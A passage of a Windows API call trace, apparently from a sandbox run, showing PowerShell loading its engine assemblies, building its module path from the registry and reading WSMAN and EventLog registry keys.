	[0119.158] CoTaskMemAlloc (cb=0x58) returned 0x2ad22d34a90
	[0119.158] lstrcpyW (in: lpString1=0x2ad22d34a90, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0119.158] CoTaskMemFree (pv=0x2ad22d34a90) 
	[0119.158] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xd7edd8aea8, puLen=0xd7edd8aea0 | out: lplpBuffer=0xd7edd8aea8*=0x2ad23455bfc, puLen=0xd7edd8aea0) returned 1
	[0119.158] lstrlenW (lpString="6.1.7600.16385") returned 14
	[0119.158] CoTaskMemAlloc (cb=0x20) returned 0x2ad22d04fa0
	[0119.158] lstrcpyW (in: lpString1=0x2ad22d04fa0, lpString2="6.1.7600.16385" | out: lpString1="6.1.7600.16385") returned="6.1.7600.16385"
	[0119.158] CoTaskMemFree (pv=0x2ad22d04fa0) 
	[0119.158] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xd7edd8aea8, puLen=0xd7edd8aea0 | out: lplpBuffer=0xd7edd8aea8*=0x2ad234558a4, puLen=0xd7edd8aea0) returned 1
	[0119.158] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0119.158] CoTaskMemAlloc (cb=0x66) returned 0x2ad22d311f0
	[0119.158] lstrcpyW (in: lpString1=0x2ad22d311f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0119.158] CoTaskMemFree (pv=0x2ad22d311f0) 
	[0119.158] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xd7edd8aea8, puLen=0xd7edd8aea0 | out: lplpBuffer=0xd7edd8aea8*=0x0, puLen=0xd7edd8aea0) returned 0
	[0119.158] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xd7edd8aea8, puLen=0xd7edd8aea0 | out: lplpBuffer=0xd7edd8aea8*=0x0, puLen=0xd7edd8aea0) returned 0
	[0119.158] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xd7edd8aea8, puLen=0xd7edd8aea0 | out: lplpBuffer=0xd7edd8aea8*=0x0, puLen=0xd7edd8aea0) returned 0
	[0119.158] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xd7edd8ae78, puLen=0xd7edd8ae70 | out: lplpBuffer=0xd7edd8ae78*=0x2ad2345584c, puLen=0xd7edd8ae70) returned 1
	[0119.214] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0119.214] VerLanguageNameW (in: wLang=0x0, szLang=0x2ad2069dc20, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0119.215] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0119.216] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\", lplpBuffer=0xd7edd8aec8, puLen=0xd7edd8aec0 | out: lplpBuffer=0xd7edd8aec8*=0x2ad234557d8, puLen=0xd7edd8aec0) returned 1
	[0119.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8aa80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0119.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8aa80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0119.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8aa80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0119.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xd7edd8aad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0119.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xd7edd8aad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0119.443] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54ea0
	[0119.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0119.443] CoTaskMemFree (pv=0x2ad22d54ea0) 
	[0120.041] CoCreateGuid (in: pguid=0xd7edd8a3e0 | out: pguid=0xd7edd8a3e0*(Data1=0xe63d2c5c, Data2=0x443a, Data3=0x486a, Data4=([0]=0xb6, [1]=0x9e, [2]=0x68, [3]=0xc4, [4]=0xdf, [5]=0x9c, [6]=0x77, [7]=0xd3))) returned 0x0
	[0120.114] CoCreateGuid (in: pguid=0xd7edd8b390 | out: pguid=0xd7edd8b390*(Data1=0x294091b7, Data2=0x6470, Data3=0x4c6e, Data4=([0]=0x87, [1]=0x69, [2]=0xfe, [3]=0x11, [4]=0x76, [5]=0xa8, [6]=0x59, [7]=0x5))) returned 0x0
	[0120.120] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54d90
	[0120.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54d90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.120] CoTaskMemFree (pv=0x2ad22d54d90) 
	[0120.134] CsrIdentifyAlertableThread () returned 0x0
	[0120.134] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d552e0
	[0120.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d552e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.134] CoTaskMemFree (pv=0x2ad22d552e0) 
	[0120.138] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d552e0
	[0120.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d552e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.139] CoTaskMemFree (pv=0x2ad22d552e0) 
	[0120.141] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54c80
	[0120.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.141] CoTaskMemFree (pv=0x2ad22d54c80) 
	[0120.141] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55a50
	[0120.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55a50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.141] CoTaskMemFree (pv=0x2ad22d55a50) 
	[0120.143] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55500
	[0120.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55500, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.143] CoTaskMemFree (pv=0x2ad22d55500) 
	[0120.328] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54c80
	[0120.328] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2ad22d54c80, nSize=0x80 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5d
	[0120.331] CoTaskMemAlloc (cb=0xcc) returned 0x2ad3baa8b60
	[0120.331] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x2ad3baa8b60, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e
	[0120.331] CoTaskMemFree (pv=0x2ad3baa8b60) 
	[0120.331] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8af08 | out: phkResult=0xd7edd8af08*=0x630) returned 0x0
	[0120.332] RegQueryValueExW (in: hKey=0x630, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xd7edd8ae8c, lpData=0x0, lpcbData=0xd7edd8ae88*=0x0 | out: lpType=0xd7edd8ae8c*=0x2, lpData=0x0, lpcbData=0xd7edd8ae88*=0xbc) returned 0x0
	[0120.332] CoTaskMemAlloc (cb=0xc0) returned 0x2ad22c7af60
	[0120.332] RegQueryValueExW (in: hKey=0x630, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xd7edd8ae5c, lpData=0x2ad22c7af60, lpcbData=0xd7edd8ae58*=0xbc | out: lpType=0xd7edd8ae5c*=0x2, lpData="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpcbData=0xd7edd8ae58*=0xbc) returned 0x0
	[0120.332] CoTaskMemFree (pv=0x2ad22c7af60) 
	[0120.332] CoTaskMemAlloc (cb=0xcc) returned 0x2ad3baa8e00
	[0120.332] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%", lpDst=0x2ad3baa8e00, nSize=0x64 | out: lpDst="C:\\Program Files") returned 0x11
	[0120.332] CoTaskMemFree (pv=0x2ad3baa8e00) 
	[0120.332] CoTaskMemAlloc (cb=0xcc) returned 0x2ad3baa90a0
	[0120.332] ExpandEnvironmentStringsW (in: lpSrc="%\\WindowsPowerShell\\Modules;%", lpDst=0x2ad3baa90a0, nSize=0x64 | out: lpDst="%\\WindowsPowerShell\\Modules;%") returned 0x1e
	[0120.332] CoTaskMemFree (pv=0x2ad3baa90a0) 
	[0120.332] CoTaskMemAlloc (cb=0xcc) returned 0x2ad3baa9f80
	[0120.332] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2ad3baa9f80, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0120.332] CoTaskMemFree (pv=0x2ad3baa9f80) 
	[0120.332] CoTaskMemAlloc (cb=0xcc) returned 0x2ad3baa8380
	[0120.332] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x2ad3baa8380, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e
	[0120.332] CoTaskMemFree (pv=0x2ad3baa8380) 
	[0120.333] RegCloseKey (hKey=0x630) returned 0x0
	[0120.333] CoTaskMemAlloc (cb=0xcc) returned 0x2ad3baa9420
	[0120.333] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x2ad3baa9420, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e
	[0120.333] CoTaskMemFree (pv=0x2ad3baa9420) 
	[0120.334] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8af08 | out: phkResult=0xd7edd8af08*=0x630) returned 0x0
	[0120.334] RegQueryValueExW (in: hKey=0x630, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xd7edd8ae8c, lpData=0x0, lpcbData=0xd7edd8ae88*=0x0 | out: lpType=0xd7edd8ae8c*=0x0, lpData=0x0, lpcbData=0xd7edd8ae88*=0x0) returned 0x2
	[0120.334] RegCloseKey (hKey=0x630) returned 0x0
	[0120.337] CoTaskMemAlloc (cb=0x20c) returned 0x2ad22d50c70
	[0120.337] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ad22d50c70 | out: pszPath="C:\\Users\\Nd9E1FYi\\Documents") returned 0x0
	[0120.338] CoTaskMemFree (pv=0x2ad22d50c70) 
	[0120.338] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents", nBufferLength=0x105, lpBuffer=0xd7edd8aa90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents", lpFilePart=0x0) returned 0x1b
	[0120.338] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 1
	[0120.339] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54510
	[0120.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.339] CoTaskMemFree (pv=0x2ad22d54510) 
	[0120.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0120.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0120.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0120.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0120.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0120.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0120.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0120.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0120.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0120.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0120.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0120.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0120.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0120.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0120.364] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54400
	[0120.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54400, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.364] CoTaskMemFree (pv=0x2ad22d54400) 
	[0120.418] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54620
	[0120.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.418] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55610
	[0120.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.419] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54c80
	[0120.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.424] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54510
	[0120.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.426] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55720
	[0120.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.426] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54a60
	[0120.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54a60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.431] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab98 | out: phkResult=0xd7edd8ab98*=0x640) returned 0x0
	[0120.432] RegQueryInfoKeyW (in: hKey=0x640, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xd7edd8aa9c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xd7edd8aa98, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xd7edd8aa9c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xd7edd8aa98*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.432] CoTaskMemFree (pv=0x0) 
	[0120.433] RegEnumValueW (in: hKey=0x640, dwIndex=0x0, lpValueName=0x2ad2069e670, lpcchValueName=0xd7edd8ab48, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="ServiceStackVersion", lpcchValueName=0xd7edd8ab48, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0120.433] RegEnumValueW (in: hKey=0x640, dwIndex=0x1, lpValueName=0x2ad2069b2e0, lpcchValueName=0xd7edd8ab48, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xd7edd8ab48, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0120.433] RegQueryValueExW (in: hKey=0x640, lpValueName="StackVersion", lpReserved=0x0, lpType=0xd7edd8ab2c, lpData=0x0, lpcbData=0xd7edd8ab28*=0x0 | out: lpType=0xd7edd8ab2c*=0x1, lpData=0x0, lpcbData=0xd7edd8ab28*=0x8) returned 0x0
	[0120.433] CoTaskMemAlloc (cb=0xc) returned 0x2ad22d56630
	[0120.433] RegQueryValueExW (in: hKey=0x640, lpValueName="StackVersion", lpReserved=0x0, lpType=0xd7edd8aafc, lpData=0x2ad22d56630, lpcbData=0xd7edd8aaf8*=0x8 | out: lpType=0xd7edd8aafc*=0x1, lpData="2.0", lpcbData=0xd7edd8aaf8*=0x8) returned 0x0
	[0120.482] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aae8 | out: phkResult=0xd7edd8aae8*=0x630) returned 0x0
	[0120.482] RegQueryInfoKeyW (in: hKey=0x630, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xd7edd8a9ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xd7edd8a9e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xd7edd8a9ec*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xd7edd8a9e8*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.482] CoTaskMemFree (pv=0x0) 
	[0120.482] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.482] RegEnumValueW (in: hKey=0x630, dwIndex=0x0, lpValueName=0x2ad2069dc20, lpcchValueName=0xd7edd8aa98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="ServiceStackVersion", lpcchValueName=0xd7edd8aa98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0120.482] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.482] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.482] RegEnumValueW (in: hKey=0x630, dwIndex=0x1, lpValueName=0x2ad2069dc20, lpcchValueName=0xd7edd8aa98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xd7edd8aa98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0120.483] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.483] RegQueryValueExW (in: hKey=0x630, lpValueName="StackVersion", lpReserved=0x0, lpType=0xd7edd8aa7c, lpData=0x0, lpcbData=0xd7edd8aa78*=0x0 | out: lpType=0xd7edd8aa7c*=0x1, lpData=0x0, lpcbData=0xd7edd8aa78*=0x8) returned 0x0
	[0120.483] CoTaskMemAlloc (cb=0xc) returned 0x2ad22d56630
	[0120.483] RegQueryValueExW (in: hKey=0x630, lpValueName="StackVersion", lpReserved=0x0, lpType=0xd7edd8aa4c, lpData=0x2ad22d56630, lpcbData=0xd7edd8aa48*=0x8 | out: lpType=0xd7edd8aa4c*=0x1, lpData="2.0", lpcbData=0xd7edd8aa48*=0x8) returned 0x0
	[0120.483] CoTaskMemFree (pv=0x2ad22d56630) 
	[0120.485] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55a50
	[0120.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55a50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.485] CoTaskMemFree (pv=0x2ad22d55a50) 
	[0120.492] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab18 | out: phkResult=0xd7edd8ab18*=0x638) returned 0x0
